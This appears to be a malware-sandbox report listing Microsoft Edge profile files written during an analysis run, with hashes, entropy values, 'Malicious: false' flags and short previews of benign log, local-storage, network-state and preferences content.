C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.284812683720469
Encrypted:	false
SSDEEP:	12:gAGB1v4Yeb8rcHEZrELFUt87AGBA/+7AGBo5LYeb8rcHEZrEZSJ:84Yeb8nZrExg88LYeb8nZrEZe
MD5:	09E56B74D5F68C229273ACF5BB4C0318
SHA1:	BA4DD009BA46344D56F9E3F4A0629A6E1315BB5C
SHA-256:	1D9A25E91B9E183613DBA0EF5A55B1CC21441D08DF45F1A1FBC28A54D6D2D6C3
SHA-512:	33BED453D2288AC3C473E44B84EAA8DE1B14133FAFC990D65C9A1EC3730727116CA5F6EA399DD736984904238159DAEC3C1EB90BBB2373743EC44206B72ECF14
Malicious:	false
Preview:	2024/11/25-05:33:56.920 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/25-05:33:56.920 1e18 Recovering log #3.2024/11/25-05:33:56.920 1e18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.284812683720469
Encrypted:	false
SSDEEP:	12:gAGB1v4Yeb8rcHEZrELFUt87AGBA/+7AGBo5LYeb8rcHEZrEZSJ:84Yeb8nZrExg88LYeb8nZrEZe
MD5:	09E56B74D5F68C229273ACF5BB4C0318
SHA1:	BA4DD009BA46344D56F9E3F4A0629A6E1315BB5C
SHA-256:	1D9A25E91B9E183613DBA0EF5A55B1CC21441D08DF45F1A1FBC28A54D6D2D6C3
SHA-512:	33BED453D2288AC3C473E44B84EAA8DE1B14133FAFC990D65C9A1EC3730727116CA5F6EA399DD736984904238159DAEC3C1EB90BBB2373743EC44206B72ECF14
Malicious:	false
Preview:	2024/11/25-05:33:56.920 1e18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/25-05:33:56.920 1e18 Recovering log #3.2024/11/25-05:33:56.920 1e18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1475
Entropy (8bit):	5.669192059867136
Encrypted:	false
SSDEEP:	24:KZWGUlHBllDmvXJw+XZ7W2sFV03y1x4/h+MyCk2jWxBIkTN5zgFHHmi28/V:KZjClavBXZK2iV03Sx4/hdy2jMt+HH33
MD5:	A7AA6BDF3CF815E75064B61A0D7949D8
SHA1:	78E3647C76429EA0BB533D51AE24BCD74DB073AF
SHA-256:	581EBDA450DB6B1C65493136B62F284B70975D72B8B29E27BB94F5B5586C66DC
SHA-512:	271550163C920E698D993220DB304330842C660393AE55C6E11325127756867F45564DAE1F388F04F0728E6EA04BECAEAC5FA885894D629614C9A0BD50583DBB
Malicious:	false
Preview:	.x.\|................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":780}.!_https://ntp.msn.com..LastKnownPV..1732530850888.-_https://ntp.msn.com..LastVisuallyReadyMarker..1732530851882.._https://ntp.msn.com..MUID!.3B41451CF8CD6E141684505EF9E46F8C.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1732530850967,"schedule":[37,34,-1,-1,-1,20,-1],"scheduleFixed":[37,34,-1,-1,-1,20,-1],"simpleSchedule":[50,22,24,14,33,41,25]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1732530850838.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241122.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.126970580941402
Encrypted:	false
SSDEEP:	6:HAXQtPCN+q2P923oH+Tcwt8a2jMGIFUt8YAXQt9GFZZmw+YAXQtfVkwO923oH+Tg:gAtPS+v4Yeb8EFUt87Atg/+7AtfV5LYL
MD5:	A9F391F15DF318B17343654DC2A862F8
SHA1:	CFD9330DA8014D949F81184E8E36B10096546B99
SHA-256:	CCE7DB0E88FAE13EAAF3BA5FD5D63265B13170BB8D758ABEE23D4A7534D1F242
SHA-512:	22A69D86FCE6EE82148449C9384B2A15D99ECCE6E7A0533EF0C286E5DAB8D9FECDFDBC1888A145BA7CBB039B02FE88E63D407F1CE70E1B1DD48436947D276015
Malicious:	false
Preview:	2024/11/25-05:33:54.331 1f2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/25-05:33:54.333 1f2c Recovering log #3.2024/11/25-05:33:54.336 1f2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.126970580941402
Encrypted:	false
SSDEEP:	6:HAXQtPCN+q2P923oH+Tcwt8a2jMGIFUt8YAXQt9GFZZmw+YAXQtfVkwO923oH+Tg:gAtPS+v4Yeb8EFUt87Atg/+7AtfV5LYL
MD5:	A9F391F15DF318B17343654DC2A862F8
SHA1:	CFD9330DA8014D949F81184E8E36B10096546B99
SHA-256:	CCE7DB0E88FAE13EAAF3BA5FD5D63265B13170BB8D758ABEE23D4A7534D1F242
SHA-512:	22A69D86FCE6EE82148449C9384B2A15D99ECCE6E7A0533EF0C286E5DAB8D9FECDFDBC1888A145BA7CBB039B02FE88E63D407F1CE70E1B1DD48436947D276015
Malicious:	false
Preview:	2024/11/25-05:33:54.331 1f2c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/25-05:33:54.333 1f2c Recovering log #3.2024/11/25-05:33:54.336 1f2c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\02e1b5ef-b337-4c4e-b2af-64345ea11305.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\644beb23-716c-4471-8f8c-f3a81fbf1b16.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\8be50629-d5c7-4086-9dad-9f66202a7f2b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9de0937f-b92f-4031-b3cc-dad617b69ce6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336110615415376
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
MD5:	7D870539B6C4EE40FA5CFD87A3D4BFEC
SHA1:	F45BE07A3A05615856688219AFE6713EBABBAC2C
SHA-256:	73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
SHA-512:	90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7768674949981946
Encrypted:	false
SSDEEP:	192:tT9NGG+xs4uLeRlrjB76EM7unibdBXcf0L/ZJVb:V9NnHeLrjB+JXI0LhJVb
MD5:	7772892BBA0AD8884B6EDA4052ED1440
SHA1:	87D2064DD7FE6C310A1442010D8F27EA92F67266
SHA-256:	FA5585BD9ED77E4636972FE55D3F1B9BC8F50EA191EDCFC7C2C912DE87261E55
SHA-512:	6E4C0D084E1462077617F6ED6AB54E3E45A771B37BAE011AC73116B3CBEAE0FA4C5735FCD750052EF7B55CD1144106AB1C2ADAB5E394161054DC5745239D84E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336110615415376
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
MD5:	7D870539B6C4EE40FA5CFD87A3D4BFEC
SHA1:	F45BE07A3A05615856688219AFE6713EBABBAC2C
SHA-256:	73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
SHA-512:	90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.1115648762610513
Encrypted:	false
SSDEEP:	48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTM4:uIEumQv8m1ccnvS6F
MD5:	5394331BABDF6658BDDCDE0EF80A979A
SHA1:	4B3E0DE8D7A4AD0305868DC0938A064A902FBED9
SHA-256:	3CF1070D468482B25D28920CCEF160DD2B04574ABD471CD1995CE56F97A26D7C
SHA-512:	6B52E1C5931D6CFCA3247915FD0C21271FA598837DE7B4FC5CB38076E522FB537DA372433856C51B3301A9AC3F563025957CD9916D6FA39903B01E3EA897F1AF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF411cf.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF4268f.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fa822fd6-14d1-4f23-9dd2-3c7affcf037c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	5.109680917336071
Encrypted:	false
SSDEEP:	192:stpkdpwsIQKsZihUk7fHA48ObV+FT+QA66WqaFIMYX+PRYJ:stpQwsIQKfhj/rbGiQx6WqaTYXh
MD5:	29F229BD91ED927B1572C33F5F48753B
SHA1:	F98A1E75BF8ACD6B9959B4EA6EEB671E1907E9E8
SHA-256:	2513B846BB3F0FD2E733AB05FB93109860E2832DCCF97D5ADC6990971A320029
SHA-512:	17DBB2C0EF091EF9C845D77581EA1DA16F57A29BD6738D70A2AD6764A205A527EFB75EDBB0C2F4F99F630B45DD0703F1285D0107ECB59EC7954CC50524F6500B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF454f2.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	5.109680917336071
Encrypted:	false
SSDEEP:	192:stpkdpwsIQKsZihUk7fHA48ObV+FT+QA66WqaFIMYX+PRYJ:stpQwsIQKfhj/rbGiQx6WqaTYXh
MD5:	29F229BD91ED927B1572C33F5F48753B
SHA1:	F98A1E75BF8ACD6B9959B4EA6EEB671E1907E9E8
SHA-256:	2513B846BB3F0FD2E733AB05FB93109860E2832DCCF97D5ADC6990971A320029
SHA-512:	17DBB2C0EF091EF9C845D77581EA1DA16F57A29BD6738D70A2AD6764A205A527EFB75EDBB0C2F4F99F630B45DD0703F1285D0107ECB59EC7954CC50524F6500B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF47d2b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	5.109680917336071
Encrypted:	false
SSDEEP:	192:stpkdpwsIQKsZihUk7fHA48ObV+FT+QA66WqaFIMYX+PRYJ:stpQwsIQKfhj/rbGiQx6WqaTYXh
MD5:	29F229BD91ED927B1572C33F5F48753B
SHA1:	F98A1E75BF8ACD6B9959B4EA6EEB671E1907E9E8
SHA-256:	2513B846BB3F0FD2E733AB05FB93109860E2832DCCF97D5ADC6990971A320029
SHA-512:	17DBB2C0EF091EF9C845D77581EA1DA16F57A29BD6738D70A2AD6764A205A527EFB75EDBB0C2F4F99F630B45DD0703F1285D0107ECB59EC7954CC50524F6500B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4b10c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9817
Entropy (8bit):	5.109680917336071
Encrypted:	false
SSDEEP:	192:stpkdpwsIQKsZihUk7fHA48ObV+FT+QA66WqaFIMYX+PRYJ:stpQwsIQKfhj/rbGiQx6WqaTYXh
MD5:	29F229BD91ED927B1572C33F5F48753B
SHA1:	F98A1E75BF8ACD6B9959B4EA6EEB671E1907E9E8
SHA-256:	2513B846BB3F0FD2E733AB05FB93109860E2832DCCF97D5ADC6990971A320029
SHA-512:	17DBB2C0EF091EF9C845D77581EA1DA16F57A29BD6738D70A2AD6764A205A527EFB75EDBB0C2F4F99F630B45DD0703F1285D0107ECB59EC7954CC50524F6500B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377004434518745","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	25012
Entropy (8bit):	5.568133553479284
Encrypted:	false
SSDEEP:	768:dHENOCxbWPMCfC18F1+UoAYDCx9Tuqh0VfUC9xbog/OVVwv62rwWp4tum:dkACxbWPMCfC1u1jagY6Ttt9
MD5:	2031C55DAFA09785FC63A056D8E2A845
SHA1:	10FA810880B9BEB732441C564E4B5F9BFF95340A
SHA-256:	1EB8191D9D6DC940A15D7060A88E168B09DB80C2E5180FB34EA7C40713AED09B
SHA-512:	4FF3DC1C6B0492878FFC8DDBA8150FCC16E0A46CC4C2BD6A0DB2E80D3455ED9A75A35E76F50E6190A1F8202A14416C559D13019079DE1BFED585AB38560667AB
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377004433895179","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_upda